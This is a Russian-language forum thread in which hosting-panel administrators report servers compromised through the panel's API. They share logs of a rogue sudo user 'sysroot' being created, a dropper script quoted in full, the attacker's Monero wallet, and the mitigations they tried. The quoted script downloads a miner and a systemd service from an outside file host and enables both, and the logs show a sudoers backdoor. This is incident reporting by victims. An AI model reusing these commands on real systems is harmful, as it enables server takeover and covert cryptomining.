Страница 1 из 6

Взломали панель и повесили майнер

Добавлено: Сб авг 15, 2020 6:11 pm
zulicheg
Привет комрады!
Надеюсь обратить внимание разрабов на возможную проблему.

Сегодня смотрю пригружен проц, посмотрел процессы, смотрю видит sshd какой-то левый и коннектится на пул майнинга монеро.

В общем взломано, создан юзер sysroot, туда залит майнер и какой-то сервис, следов правда не смог найти

Создали юзера судя по всему через API панели

Код: Выделить всё

Jul 25 17:09:23 zuli sudo:    root : TTY=unknown ; PWD=/etc/brainy/api ; USER=root ; COMMAND=/bin/bash -c userdel -f sysroot
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Jul 25 17:09:23 zuli userdel[10574]: delete user 'sysroot'
Jul 25 17:09:23 zuli userdel[10574]: removed group 'sysroot' owned by 'sysroot'
Jul 25 17:09:23 zuli userdel[10574]: removed shadow group 'sysroot' owned by 'sysroot'
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session closed for user root
Jul 25 17:09:23 zuli sudo:    root : TTY=unknown ; PWD=/etc/brainy/api ; USER=root ; COMMAND=/sbin/useradd -p sa3tHJ3/KuYvI sysroot
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Jul 25 17:09:23 zuli useradd[10584]: new group: name=sysroot, GID=1010
Jul 25 17:09:23 zuli useradd[10584]: new user: name=sysroot, UID=1009, GID=1010, home=/home/sysroot, shell=/bin/bash
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session closed for user root
Jul 25 17:09:23 zuli sudo:    root : TTY=unknown ; PWD=/etc/brainy/api ; USER=root ; COMMAND=/bin/sh -c echo "sysroot:password" | chpasswd
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
Jul 25 17:09:23 zuli sudo: pam_unix(sudo:session): session closed for user root
Jul 25 17:09:23 zuli sudo:    root : TTY=unknown ; PWD=/etc/brainy/api ; USER=root ; COMMAND=/bin/sh -c echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers
был залит залит скрипт.

Код: Выделить всё

if [ -f /etc/lsb-release ]; then
    #ubuntu
    sudo wget -O /home/sysroot/sshd https://files.catbox.moe/eg4s5s
    chmod +x /home/sysroot/sshd
    sudo wget -O /lib/systemd/system/sshd_extra.service https://files.catbox.moe/b1t7cv.service
    sudo systemctl daemon-reload
    sudo systemctl enable sshd_extra.service
    sudo systemctl start sshd_extra.service
fi

if [ -f /etc/redhat-release ]; then
   sudo wget -O /home/sysroot/sshd https://files.catbox.moe/eg4s5s
   chmod +x /home/sysroot/sshd
   sudo wget -O /etc/systemd/system/multi-user.target.wants/sshd_extra.service https://files.catbox.moe/b1t7cv.service
   sudo systemctl daemon-reload
   sudo systemctl enable sshd_extra.service
   sudo systemctl start sshd_extra.service
fi
Ну и в общем кто-то майнит на адрес монеро (на данный момент 65 килохешей) 49ZNRzJYncy5KaabHuMXqHcfRCg8WR7xULjf5YJyXtoYcSM4j6EYhQR8rne8Ee4Fk3XDNi61wEDmMXtfMKKLdKXZ5JUVhkj


Непонятно что теперь делать, ведь как по классике жанра бэкап был сделан давно :) Ну и нужно срочно закрыть дыр в панели!

Очень теперь напрягает мысль о том, что так легко можно ломать панель и делать все что угодно там.

P.S. Сейчас зашел на другой сервер, где тоже панель стоит, та же картина, юзер sysroot и запущенный майнер. Видимо кто-то знает панель изнутри и легко работает с ней. Хорошо что другой сервер для тестов и есть снапшот, откачусь, но что делать то, как защитить себя?

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 5:07 am
KyKyIIIKuH
25 июля тоже появился пользователь sysroot, хорошо скриптов не было

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 9:20 am
zulicheg
KyKyIIIKuH писал(а):
Вс авг 16, 2020 5:07 am
25 июля тоже появился пользователь sysroot, хорошо скриптов не было
У меня тоже не было, до вчерашнего дня. Видимо или отлеживались логины или собирались чтобы потом сразу навешать скриптов. Как решил вопрос? Ведь если ломают через панель это серьезно.

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 9:23 am
KyKyIIIKuH
zulicheg писал(а):
Вс авг 16, 2020 9:20 am
KyKyIIIKuH писал(а):
Вс авг 16, 2020 5:07 am
25 июля тоже появился пользователь sysroot, хорошо скриптов не было
У меня тоже не было, до вчерашнего дня. Видимо или отлеживались логины или собирались чтобы потом сразу навешать скриптов. Как решил вопрос? Ведь если ломают через панель это серьезно.
никак не решал этот вопрос.
логи смотрел = пусто, вот это странно

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 10:03 am
zulicheg
KyKyIIIKuH писал(а):
Вс авг 16, 2020 9:23 am
никак не решал этот вопрос.
логи смотрел = пусто, вот это странно
Ну значит скоро повесят.

Я на одном сервере откатился до исходного состояния, сменил порт панели, ограничил доступ в панель со своих адресов, заблокировал ssh-доступ. Не знаю насколько это поможет, буду смотреть. А вот как быть с сервером где должно с любых адресов ходить в панель... В общем жду ответа разрабов.

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 10:08 am
KyKyIIIKuH
zulicheg писал(а):
Вс авг 16, 2020 10:03 am
KyKyIIIKuH писал(а):
Вс авг 16, 2020 9:23 am
никак не решал этот вопрос.
логи смотрел = пусто, вот это странно
Ну значит скоро повесят.

Я на одном сервере откатился до исходного состояния, сменил порт панели, ограничил доступ в панель со своих адресов, заблокировал ssh-доступ. Не знаю насколько это поможет, буду смотреть. А вот как быть с сервером где должно с любых адресов ходить в панель... В общем жду ответа разрабов.
у меня доступ по ssh только с разрешенных адресов
в панели тоже запрет на поставил по IP
пароль сменил от греха по дальше

буду тоже ждать ответа

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 11:21 am
ordex
Проверил у себя, пользователя нет. Панель на домене (стандартный 443 порт) наружу открыты только 22, 80, 443. Доступ ssh только по ключам.

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 11:32 am
KyKyIIIKuH
ordex писал(а):
Вс авг 16, 2020 11:21 am
Проверил у себя, пользователя нет. Панель на домене (стандартный 443 порт) наружу открыты только 22, 80, 443. Доступ ssh только по ключам.
у меня в хост-аккаунтах не светился пользователь
а вот в директории /home/ был

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 11:41 am
ordex
KyKyIIIKuH писал(а):
Вс авг 16, 2020 11:32 am
ordex писал(а):
Вс авг 16, 2020 11:21 am
Проверил у себя, пользователя нет. Панель на домене (стандартный 443 порт) наружу открыты только 22, 80, 443. Доступ ssh только по ключам.
у меня в хост-аккаунтах не светился пользователь
а вот в директории /home/ был
я смотрел в /etc/passwd , в /home тоже ничего лишнего. В панеле не смотрел, сейчас посмотрел - тоже пусто.

Re: Взломали панель и повесили майнер

Добавлено: Вс авг 16, 2020 11:49 am
KyKyIIIKuH
ordex писал(а):
Вс авг 16, 2020 11:41 am
KyKyIIIKuH писал(а):
Вс авг 16, 2020 11:32 am
ordex писал(а):
Вс авг 16, 2020 11:21 am
Проверил у себя, пользователя нет. Панель на домене (стандартный 443 порт) наружу открыты только 22, 80, 443. Доступ ssh только по ключам.
у меня в хост-аккаунтах не светился пользователь
а вот в директории /home/ был
я смотрел в /etc/passwd , в /home тоже ничего лишнего. В панеле не смотрел, сейчас посмотрел - тоже пусто.

Код: Выделить всё

[root@centos-16gb-fsn1-1 ~]# cat  /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
webalizer:x:67:994:Webalizer:/var/www/usage:/sbin/nologin
brainyservice:x:1000:1000::/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
mailnull:x:47:12::/var/spool/mqueue:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
exim:x:93:93::/var/spool/exim:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:997:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
opendkim:x:996:992:OpenDKIM Milter:/var/run/opendkim:/sbin/nologin
opendmarc:x:995:991:OpenDMARC Milter:/var/run/opendmarc:/sbin/nologin
memcached:x:994:990:Memcached daemon:/run/memcached:/sbin/nologin
shellinabox:x:993:989:Shellinabox:/var/lib/shellinabox:/sbin/nologin
ftpuser-read:x:1002:1003::/dev/null:/etc
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:992:988:Nginx web server:/var/lib/nginx:/sbin/nologin
sysroot:x:1007:1008::/home/sysroot:/bin/bash
прописался гад